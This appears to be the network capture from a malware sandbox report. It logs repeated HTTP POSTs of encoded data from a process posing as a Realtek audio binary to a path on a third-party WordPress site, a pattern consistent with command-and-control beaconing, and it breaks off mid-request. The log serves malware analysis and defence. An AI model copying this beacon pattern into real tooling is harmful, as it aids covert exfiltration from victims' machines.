                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:58:17.620177984 CET200INData Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e
                                                                                                                                                                              Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              45192.168.11.2049803134.0.14.158806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:23.323421001 CET758OUTPOST /4300/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.aballanet.cat
                                                                                                                                                                              Origin: http://www.aballanet.cat
                                                                                                                                                                              Referer: http://www.aballanet.cat/4300/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 51 2f 51 35 66 52 49 2b 34 41 5a 6d 73 4d 62 4c 51 42 54 44 49 4a 44 35 69 6a 36 4d 76 49 51 32 71 69 65 6d 41 64 32 32 2b 57 49 30 4a 7a 75 45 48 5a 4b 47 4b 57 43 43 45 37 79 36 65 35 77 31 5a 52 66 2b 6c 4d 54 55 6d 4b 48 31 73 46 67 69 54 44 62 71 30 70 6c 54 61 36 78 73 69 2f 76 70 35 70 5a 53 74 51 53 32 36 39 6d 63 6f 72 44 6d 68 51 50 4f 53 6c 59 6c 30 4f 2b 5a 4d 39 5a 51 63 5a 78 63 57 6b 36 64 33 6f 39 5a 67 76 74 45 2b 7a 2f 76 49 6e 77 45 78 4d 61 6f 4c 76 64 4e 56 74 31 2f 2f 69 62 73 4d 41 76 59 54 30 68 6e 69 75 2b 79 31 4d 2f 67 58 7a 6c 59 47 6c 71 67 57 41 3d 3d
                                                                                                                                                                              Data Ascii: iS=Q/Q5fRI+4AZmsMbLQBTDIJD5ij6MvIQ2qiemAd22+WI0JzuEHZKGKWCCE7y6e5w1ZRf+lMTUmKH1sFgiTDbq0plTa6xsi/vp5pZStQS269mcorDmhQPOSlYl0O+ZM9ZQcZxcWk6d3o9ZgvtE+z/vInwExMaoLvdNVt1//ibsMAvYT0hniu+y1M/gXzlYGlqgWA==
                                                                                                                                                                              Jan 11, 2025 03:58:23.737550974 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:23 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UPC"> <meta name='robots' content='noindex,
                                                                                                                                                                              Jan 11, 2025 03:58:23.737627983 CET1289INData Raw: 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 69 5d 2c 20 5b 73 69 7a 65 73 5e 3d 22 61 75 74 6f 2c 22 20 69 5d 29 20 7b 20 63 6f 6e 74 61 69 6e 2d 69 6e 74 72 69 6e 73 69
                                                                                                                                                                              Data Ascii: follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og
                                                                                                                                                                              Jan 11, 2025 03:58:23.737677097 CET1289INData Raw: 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 5c
                                                                                                                                                                              Data Ascii: i\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,times
                                                                                                                                                                              Jan 11, 2025 03:58:23.737732887 CET1289INData Raw: 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79
                                                                                                                                                                              Data Ascii: nCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.
                                                                                                                                                                              Jan 11, 2025 03:58:23.737782955 CET512INData Raw: 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79
                                                                                                                                                                              Data Ascii: thing&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMR
                                                                                                                                                                              Jan 11, 2025 03:58:23.738063097 CET1289INData Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                                                                                                                                              Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                                                                                                                                              Jan 11, 2025 03:58:23.738136053 CET1289INData Raw: 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 65 64 69 74 6f 72 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e
                                                                                                                                                                              Data Ascii: r-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.cat/wp-content/plugins/algori-pdf-viewer/dist/blocks.s
                                                                                                                                                                              Jan 11, 2025 03:58:23.738178968 CET1289INData Raw: 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 30 30 64 30 38 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63
                                                                                                                                                                              Data Ascii: green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to
                                                                                                                                                                              Jan 11, 2025 03:58:23.738400936 CET1289INData Raw: 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 33 2c 31 31 32 29 20 30 25 2c 72 67 62 28 31 39 39 2c 38 31 2c 31 39 32 29 20 35 30 25 2c 72 67 62 28
                                                                                                                                                                              Data Ascii: luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient
                                                                                                                                                                              Jan 11, 2025 03:58:23.738449097 CET1289INData Raw: 20 77 72 61 70 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 20 3e 20 3a 69 73 28 2a 2c 20 64 69 76 29 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75
                                                                                                                                                                              Data Ascii: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2
                                                                                                                                                                              Jan 11, 2025 03:58:23.960829973 CET1289INData Raw: 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70
                                                                                                                                                                              Data Ascii: ortant;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              46192.168.11.2049804134.0.14.158806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:26.077445984 CET778OUTPOST /4300/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.aballanet.cat
                                                                                                                                                                              Origin: http://www.aballanet.cat
                                                                                                                                                                              Referer: http://www.aballanet.cat/4300/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 51 2f 51 35 66 52 49 2b 34 41 5a 6d 75 74 72 4c 53 69 72 44 41 4a 44 2b 74 44 36 4d 6d 6f 51 79 71 69 43 6d 41 63 7a 72 2b 6b 38 30 4a 54 65 45 47 59 4b 47 4c 57 43 43 4b 62 79 69 54 5a 77 79 5a 52 43 64 6c 4f 48 55 6d 4b 44 31 73 41 4d 69 54 31 54 6c 31 35 6c 52 53 61 78 75 2f 76 76 70 35 70 5a 53 74 52 33 74 36 39 2b 63 72 61 54 6d 67 78 50 4e 52 6c 59 36 38 75 2b 5a 48 64 5a 71 63 5a 78 75 57 67 6a 56 33 74 78 5a 67 71 4a 45 39 6e 72 73 43 6e 77 47 2f 73 62 34 44 75 38 67 54 4d 77 50 77 67 62 50 42 43 37 7a 62 43 73 39 2f 63 4b 57 32 66 6a 53 54 44 63 77 45 6e 72 37 4c 50 48 7a 44 37 2b 41 78 4d 76 35 45 62 58 62 72 36 54 47 45 74 77 3d
                                                                                                                                                                              Data Ascii: iS=Q/Q5fRI+4AZmutrLSirDAJD+tD6MmoQyqiCmAczr+k80JTeEGYKGLWCCKbyiTZwyZRCdlOHUmKD1sAMiT1Tl15lRSaxu/vvp5pZStR3t69+craTmgxPNRlY68u+ZHdZqcZxuWgjV3txZgqJE9nrsCnwG/sb4Du8gTMwPwgbPBC7zbCs9/cKW2fjSTDcwEnr7LPHzD7+AxMv5EbXbr6TGEtw=
                                                                                                                                                                              Jan 11, 2025 03:58:26.487404108 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:26 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UPC"> <meta name='robots' content='noindex,
                                                                                                                                                                              Jan 11, 2025 03:58:26.487478018 CET1289INData Raw: 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 69 5d 2c 20 5b 73 69 7a 65 73 5e 3d 22 61 75 74 6f 2c 22 20 69 5d 29 20 7b 20 63 6f 6e 74 61 69 6e 2d 69 6e 74 72 69 6e 73 69
                                                                                                                                                                              Data Ascii: follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og
                                                                                                                                                                              Jan 11, 2025 03:58:26.487521887 CET1289INData Raw: 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 5c
                                                                                                                                                                              Data Ascii: i\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,times
                                                                                                                                                                              Jan 11, 2025 03:58:26.487585068 CET1289INData Raw: 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79
                                                                                                                                                                              Data Ascii: nCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.
                                                                                                                                                                              Jan 11, 2025 03:58:26.487633944 CET512INData Raw: 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79
                                                                                                                                                                              Data Ascii: thing&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMR
                                                                                                                                                                              Jan 11, 2025 03:58:26.487924099 CET1289INData Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                                                                                                                                              Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                                                                                                                                              Jan 11, 2025 03:58:26.487998009 CET1289INData Raw: 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 65 64 69 74 6f 72 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e
                                                                                                                                                                              Data Ascii: r-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.cat/wp-content/plugins/algori-pdf-viewer/dist/blocks.s
                                                                                                                                                                              Jan 11, 2025 03:58:26.488042116 CET1289INData Raw: 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 30 30 64 30 38 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63
                                                                                                                                                                              Data Ascii: green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to
                                                                                                                                                                              Jan 11, 2025 03:58:26.488101959 CET1289INData Raw: 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 33 2c 31 31 32 29 20 30 25 2c 72 67 62 28 31 39 39 2c 38 31 2c 31 39 32 29 20 35 30 25 2c 72 67 62 28
                                                                                                                                                                              Data Ascii: luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient
                                                                                                                                                                              Jan 11, 2025 03:58:26.488256931 CET1289INData Raw: 20 77 72 61 70 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 20 3e 20 3a 69 73 28 2a 2c 20 64 69 76 29 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75
                                                                                                                                                                              Data Ascii: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2
                                                                                                                                                                              Jan 11, 2025 03:58:26.710719109 CET1289INData Raw: 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70
                                                                                                                                                                              Data Ascii: ortant;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              47192.168.11.2049805134.0.14.158806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:28.826461077 CET2578OUTPOST /4300/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
